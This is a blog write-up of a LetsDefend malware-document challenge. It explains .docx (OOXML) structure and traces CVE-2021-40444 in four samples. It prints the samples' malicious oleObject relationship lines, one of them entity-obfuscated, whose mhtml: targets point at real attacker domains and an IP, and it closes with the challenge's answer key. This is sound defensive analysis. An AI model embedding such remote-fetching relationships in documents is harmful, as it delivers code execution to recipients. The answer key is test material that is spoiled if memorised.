Post

MSHTML & OOXML (.docx) Analysis

Uncover how attackers exploit .docx files using MSHTML components like mhtml. Learn to analyze .docx structures exposing malicious metadata and payloads.

MSHTML & OOXML (.docx) Analysis

Hey guys, its been a minute since I wrote something (busy adult & work life … lol 😅). Anyways, Ever wondered how a simple Word document can hide dangerous cyber threats? 🤔 In this blog, I’m discussing my latest research into .docx files and MSHTML exploits, inspired by LetsDefend MSHTML Challenge Credits to the creator - Bohan Zhang- a Threat Intelligence Analyst. We’ll dive into the sneaky ways attackers exploit .docx files using MSHTML components like mhtml: strings, unpack OOXML structures with tools like zipdump.py, and hunt for malicious metadata/payloads. This one’s a bit technical, so grab your coffee and let’s get started! ☕💻.

Huge shoutout to my buddy d3xt3r for the research support and motivation.

Check out my other blogs for more tips on investigating malicious documents:

Brief

We’re tasked with analyzing four malicious document samples from MalwareBazaar suspected of exploiting a specific vulnerability. The lab involves hunting for suspicious domains and IP addresses.

To download the samples, use one of these hashsums:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
md5sum *
45e7d6562bfddb816d45649dd667abde  Employee_W2_Form.docx
d5742309ba8146be9eab4396fde77e4e  Employees_Contact_Audit_Oct_2021.docx
41dacae2a33ee717abcc8011b705f2cb  Work_From_Home_Survey.doc
55998cb43459159a5ed4511f00ff3fc8  income_tax_and_benefit_return_2021.docx
➜   sha256sum *
679bbe0c50754853978a3a583505ebb99bce720cf26a6aaf8be06cd879701ff1  Employee_W2_Form.docx
ed2b9e22aef3e545814519151528b2d11a5e73d1b2119c067e672b653ab6855a  Employees_Contact_Audit_Oct_2021.docx
84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69  Work_From_Home_Survey.doc
d0e1f97dbe2d0af9342e64d460527b088d85f96d38b1d1d4aa610c0987dca745  income_tax_and_benefit_return_2021.docx
➜   sha1sum *
00087e46ec0ef6225de59868fd016bd9dd77fa3c  Employee_W2_Form.docx
8aaa79ee4a81d02e1023a03aee62a47162a9ff04  Employees_Contact_Audit_Oct_2021.docx
4b35d14a2eab2b3a7e0b40b71955cdd36e06b4b9  Work_From_Home_Survey.doc
9bec2182cc5b41fe8783bb7ab6e577bac5c19f04  income_tax_and_benefit_return_2021.docx
root@ip-172-31-6-252:~/Desktop/ChallengeFiles# 

Remember to deal with suspicious files in a sandbox environment.

Lets start by first understanding what a DOC & DOCX Files are.

What is a DOC & DOCX File?

Simply put:

  • A DOCX file is the standard file format for documents created in Microsoft Word, introduced as an upgrade to the older DOC format in 2007. It’s a part of the Office Open XML (OOXML) standard, which uses XML (Extensible Markup Language) to store document content, styles, and other elements. It also uses ZIP compression to keep file sizes small.
  • A DOC file is a Microsoft Word document format, specifically the older format used by versions of Word before 2007. DOC files are based on the binary interchange file format (BIFF), which stores information as binary files. In a DOC file, data are organized as a collection of records and structures arranged in binary streams

In terms of magic bytes, a docx file starts with 50 4B 03 04

image

A doc file on the other end typically start with D0 CF 11 E0 A1 B1 1A E1

image

Difference between DOC and DOCX

I did a small general comparison for both files:

CharacteristicsDOCDOCX
CompatibilityCompatible with older versions of Microsoft WordCompatible with modern versions of Microsoft Word
File Extension.doc.docx
File SizeLarger file size due to binary structureSmaller file size due to better compression and XML format
File StructureBinary format, not human-readableXML-based format, human-readable and machine-readable
ConversionCan be converted to DOCX and other formatsCan be converted to other formats and vice versa
StandardizationNo standardized formatBased on the ISO/IEC 29500 standard (Office Open XML)

LAB

To better understand the OOXML structure of .docx files, I created a demo file from scratch called Lab.docx using Microsoft Word, with dummy text. (I plan to experiment with Google Docs or Calibre to compare their .docx structures in a future post.) Let’s dive into analyzing Lab.docx to uncover its components and threat potential.

image

Since a .docx file is essentially a ZIP archive, you can unzip it using tools like unzip or 7zip to reveal its contents for analysis, as demonstrated below.

image image

Tools

For folks who love using Linux or web applications for analysis, I’ll also be sharing some tools and ticks to use. The DidierStevensSuite by Didier Stevens offers a great collection of scripts for analysis. In this blog, we’ll mostly be using the following tools:

My go to online analyzer for quick analysis is IRIS-H Digital Forensics (Definitely check it out)

Basic Analysis

Continuing with our basic analysis, a documents EXIF data is critical for a researcher as it can reveal metadata like author, creation date, and application version for various purposes. These include:

  • Linking the document to a campaign.
  • Spot inconsisencies in document timestamps.
  • Discover potentially embedded data.

In the structure of a .docx file, this metadata info is usually stored in two files called docProps/core.xml and docProps/app.xml

To check the details, simply run the exiftool command alongside the file in question.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
➜  exiftool Lab.docx
ExifTool Version Number         : 13.25
File Name                       : Lab.docx
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2025:06:05 12:44:12+00:00
File Access Date/Time           : 2025:06:05 12:44:21+00:00
File Inode Change Date/Time     : 2025:06:05 12:44:12+00:00
File Permissions                : -rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x576f9132
Zip Compressed Size             : 358
Zip Uncompressed Size           : 1445
Zip File Name                   : [Content_Types].xml
Title                           :
Subject                         :
Creator                         : Test Author
Keywords                        :
Description                     :
Last Modified By                : Test Author
Revision Number                 : 2
Create Date                     : 2025:06:05 12:36:00Z
Modify Date                     : 2025:06:05 12:41:00Z
Template                        : Normal.dotm
Total Edit Time                 : 5 minutes
Pages                           : 1
Words                           : 23
Characters                      : 134
Application                     : Microsoft Office Word
Doc Security                    : None
Lines                           : 1
Paragraphs                      : 1
Scale Crop                      : No
Company                         :
Links Up To Date                : No
Characters With Spaces          : 156
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 16.0000

As a researcher, details such as: Creator , Create Date, Application, Modify Date, Pages, Words, Characters would matter to me - but I’ll explain this more later in the blog.

Docx Structure

Next, we can use a tool like zipdump to analyze a ZIP file contents as shown:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜  python3 zipdump.py Lab.docx

Index Filename                     Encrypted Timestamp
    1 [Content_Types].xml                  0 1980-01-01 00:00:00
    2 _rels/.rels                          0 1980-01-01 00:00:00
    3 word/document.xml                    0 1980-01-01 00:00:00
    4 word/_rels/document.xml.rels         0 1980-01-01 00:00:00
    5 word/theme/theme1.xml                0 1980-01-01 00:00:00
    6 word/settings.xml                    0 1980-01-01 00:00:00
    7 word/numbering.xml                   0 1980-01-01 00:00:00
    8 word/styles.xml                      0 1980-01-01 00:00:00
    9 word/webSettings.xml                 0 1980-01-01 00:00:00
   10 word/fontTable.xml                   0 1980-01-01 00:00:00
   11 docProps/core.xml                    0 1980-01-01 00:00:00
   12 docProps/app.xml                     0 1980-01-01 00:00:00

Note that each Filename has a different Index number

I’ll leave a small cheat sheet here that you can use for further analysis across the blog post

1
2
3
4
5
6
7
8
9
10
11
12
13
# Examine contents of OOXML file
python3 zipdump.py Lab.docx
or
python3 zipdump.py -i Lab.docx

# Extract file with specific index `3` from a file to STDOUT.
python3 zipdump.py Lab.docx -s 3 -d 

# Extract all files
python3 zipdump.py Lab.docx -D

# Print additional information
python3 zipdump.py Lab.docx -e

Simply explained:

SWIPE/DRAG TO VIEW FULL TABLE

FilePurposeMalware/Research Relevance
[Content_Types].xmlDefines MIME types for all parts in the .docx archive.Can reveal unexpected file types (e.g., .vbs, .exe, .xml) indicating embedded malicious content.
_rels/.relsLinks top-level components (e.g., document, metadata). Basically defines relationships to document.xml, core.xml, app.xml.Malicious relationships may point to external resources (e.g., URLs for C2 servers) , remote OLE objects or scripts.
word/document.xmlMain document content (text, paragraphs, macros, tables, embedded objects).Common target for:
- Macro-based malware (VBA, OLE).
- Exploits (e.g., CVE-2017-0199 for remote templates).
- Obfuscated scripts (hidden text, XML bombs).
word/_rels/document.xml.rels Links external resources (images, hyperlinks, embedded objects).Used to:
- Load malicious payloads from remote URLs.
- Reference embedded exploits (e.g., OLE objects).
word/theme/theme1.xmlDefines visual styling (colors, fonts).Rarely abused, but could conceal suspicious objects in obfuscated themes
word/settings.xmlDocument settings (macros, protections, external links, zoom, spell-check).Critical for:
- Enabling macros (attack vector).
- Disabling security warnings.
- Linking to malicious templates (attachedTemplate).
word/numbering.xmlDefines list formatting (bullets, numbering).Low risk attack surface
word/styles.xmlStyles (fonts, spacing, hidden text).Can be used to:
- Hide malicious content (e.g., white text).
- Obfuscate script fragments in style names.
word/webSettings.xmlConfigures web view or HTML conversion settings.Rarely malicious, but may contain odd redirects or URLs.
word/fontTable.xmlLists fonts used in the document.Could reference malicious font files (e.g., CVE-2015-3052 font parsing vulns).
docProps/core.xmlStores core metadata (e.g., author, creation date).Useful for:
- Attribution (threat actor fingerprints).
- Detecting tampering (e.g., fake timestamps).
docProps/app.xmlStores app-specific metadata (e.g., word count, Word version, page count).May reveal anomalies (e.g., mismatched word counts due to hidden content or weaponized toolkits like CactusTorch).

Visual Overview:

  • [Content_Types].xml - Defines the MIME types (content types) of all the parts within the package. It tells the software like Word what kind of data each file contains (e.g., XML, images, etc.).

image

  • _rels/.rels - Contains the root relationships of the document. It points to the key components of the document, such as the main document (word/document.xml) and metadata files (docProps/core.xml and docProps/app.xml).

image

  • word/document.xml - The main file containing the actual content of the document (text, paragraphs, tables, etc.), stored in a structured XML format. For example the dummy text I had in the document earlier

image

  • word/_rels/document.xml.rels - Contains relationships for resources referenced in document.xml, such as hyperlinks, images, styles, or external files.

image

  • word/theme/theme1.xml - Defines the color scheme, fonts, and other visual theme elements used in the document.

image

  • word/settings.xml - Stores document-level settings, such as proofing options, zoom level, compatibility settings, and other Word-specific configurations.

image image

  • word/numbering.xml - Defines the numbering (bullets and numbering) styles used in lists throughout the document.

image

word/styles.xml

image

  • word/webSettings.xml - Stores settings specific to how the document should behave when opened in a web browser or saved as a webpage.

image

word/fontTable.xml

image

  • word/fontTable.xml - Lists all the fonts used in the document, including fallback fonts if the primary font is not available.

image

  • docProps/core.xml - Contains core document properties (metadata) such as title, author, creation/modification dates, and keywords.

image

  • docProps/app.xml - Contains application-specific metadata, such as word count, page count, and other statistics.

image

Analysis Samples

Now that we have solid information of the structure of a docx file, we can start analyzing the suspicious files. Using tools like zipdump.py , we can dump their file contents using the following syntax:

1
2
3
4
python3 zipdump.py Work_From_Home_Survey.doc
python3 zipdump.py Employee_W2_Form.docx
python3 zipdump.py Employees_Contact_Audit_Oct_2021.docx
python3 zipdump.py Work_From_Home_Survey.doc
  • Employees_Contact_Audit_Oct_2021.docx

image

  • Employee_W2_Form.docx

image

  • Work_From_Home_Survey.doc

image

  • income_tax_and_benefit_return_2021.docx

image

I noticed something interesting and common all 4 samples in the word/_rels/document.xml.rels.

After spending sometime analyzing Employee_W2_Form.docx for example, Index 13 (word/_rels/document.xml.rels) piqued my interest after examining most of the files individually.

I noted an interesting string:

image

MSHTML

Earlier we talked about a file called word/_rels/document.xml.rels that maps connections between document components and external resources, like links, images, or templates. This file uses XML to define relationships, specifying how parts of the document interact with internal or external content. Now, attackers exploit this structure to embed harmful payloads, often leveraging Microsoft’s MSHTML engine (used for rendering HTML in Internet Explorer) to execute remote code or deliver malware.

document.xml.rels can be exploited in various way’s such as:

  • Remote Template Injection
  • Embedding Malicious HTML via MSHTML (eg CVE-2021-40444)
  • Follina Exploit (CVE-2022-30190)
  • NoRelationship Attack

Malicious files exploiting MSHTML often involve:

  • HTML Files - Typically hosteded remotely and reference in the document.xml.rels , these files use JavaScript or ActiveX to exploit MSHTML flaws, executing code or downloading payloads like DLLs or executables.
  • Cabinet (.cab) Files: this type of files have been used in attacks like CVE-2021-40444, where a .cab file containing a malicious DLL is fetched via an HTML link in document.xml.rels. The DLL is executed via MSHTML’s processing of the .cab file.
  • RTF and MHTML Files: Documents can reference RTF or MHTML files that exploit MSHTML vulnerabilities (e.g., CVE-2017-8759), triggering exploits when rendered.

Nicolas Krassas - @Dinosn did post a tweet around Sep 10, 2021 of a clear PoC (By now it doesnt exist) for CVE-2021-40444.

Analysis Continuation …

Back to Employee_W2_Form.docx , in Index 13 (word/_rels/document.xml.rels) piqued my interest. I noted the interesting string:

1
<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:arsenal.30cm.tw:1212/word.html!x-usc:arsenal.30cm.tw:1212/word.html" TargetMode="External"/>

image

At a high level:

When the .docx file is opened, Word processes the document.xml.rels file and encounters this relationship. The oleObject relationship triggers MSHTML to fetch and render the MHTML file at arsenal.30cm.tw:1212/word.html . The MHTML file may contain JavaScript, ActiveX controls, or a reference to another payload (e.g., a .cab file or DLL), exploiting an MSHTML vulnerability to execute code.

if you care about the tiny details, lets break it down:

  • Id="rId6" - unique identifier assigned to this relationship within the document.
  • Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" - The Type attribute specifies the type of relationship, in this case, an oleObject. This indicates that the relationship points to an Object Linking and Embedding (OLE) object, which can be an embedded file, external resource, or ActiveX control.
  • Target="mhtml:arsenal.30cm.tw:1212/word.html!x-usc:arsenal.30cm.tw:1212/word.html" - The Target attribute specifies the location of the resource being referenced. Here, it points to an external resource using the mhtml protocol, which is associated with MHTML (MIME HTML), a format that combines HTML and its resources into a single file.
    • The URL arsenal.30cm.tw:1212/word.html suggests a remote server (arsenal.30cm.tw) on a non-standard port 1212, hosting a file named word.html.
    • The !x-usc:arsenal.30cm.tw:1212/word.html part is an MHTML-specific syntax, indicating a specific resource within the MHTML archive. The x-usc directive is a Microsoft-specific directive used in MHTML to reference resources within an .mht file or external URLs.
  • TargetMode="External" - indicates that the resource is external to the document (i.e., not embedded within the .docx file). Technically this means that the document will attempt to fetch the resource from the specified URL when opened, potentially triggering malicious behavior.

Now that we have that understood, lets fetch the rest of the mhtml attributes from the rest of the documents.

Employees_Contact_Audit_Oct_2021.docx

1
mhtml:http://175.24.190.249/note.html!x-usc:http://175.24.190.249/note.html

image

income_tax_and_benefit_return_2021.docx

1
mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html

image

Work_From_Home_Survey.doc

Things got a little interesting on analyzing Work_From_Home_Survey.doc.

image

I spotted this obfuscated

1
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/&#x6f;&#x6c;&#x65;&#x4f;&#x62;&#x6a;&#x65;&#x63;&#x74;" Target="&#109;&#104;&#116;&#109;&#108;&#58;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#116;&#114;&#101;&#110;&#100;&#112;&#97;&#114;&#108;&#121;&#101;&#46;&#99;&#111;&#109;&#47;&#119;&#105;&#107;&#105;&#48;&#53;&#48;&#57;&#46;&#104;&#116;&#109;&#108;&#33;&#120;&#45;&#117;&#115;&#99;&#58;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#116;&#114;&#101;&#110;&#100;&#112;&#97;&#114;&#108;&#121;&#101;&#46;&#99;&#111;&#109;&#47;&#119;&#105;&#107;&#105;&#48;&#53;&#48;&#57;&#46;&#104;&#116;&#109;&#108;" TargetMode="&#x45;&#x78;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;"/>

CyberChef - From HTML Entity

image

1
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://trendparlye.com/wiki0509.html!x-usc:http://trendparlye.com/wiki0509.html" TargetMode="External"

TO BE CONTINUED …

References

Questions

Examing the Employees_Contact_Audit_Oct_2021.docx file, what is the malicious IP in the docx file?

175.24.190.249

Examing the Employee_W2_Form.docx file, what is the malicious domain in the docx file?

arsenal.30cm.tw

Examing the Work_From_Home_Survey.doc file, what is the malicious domain in the doc file?

trendparlye.com

Examing the income_tax_and_benefit_return_2021.docx, what is the malicious domain in the docx file?

hidusi.com

What is the vulnerability the above files exploited?

cve-2021-40444

TO BE CONTINUED …

This post is licensed under CC BY 4.0 by the author.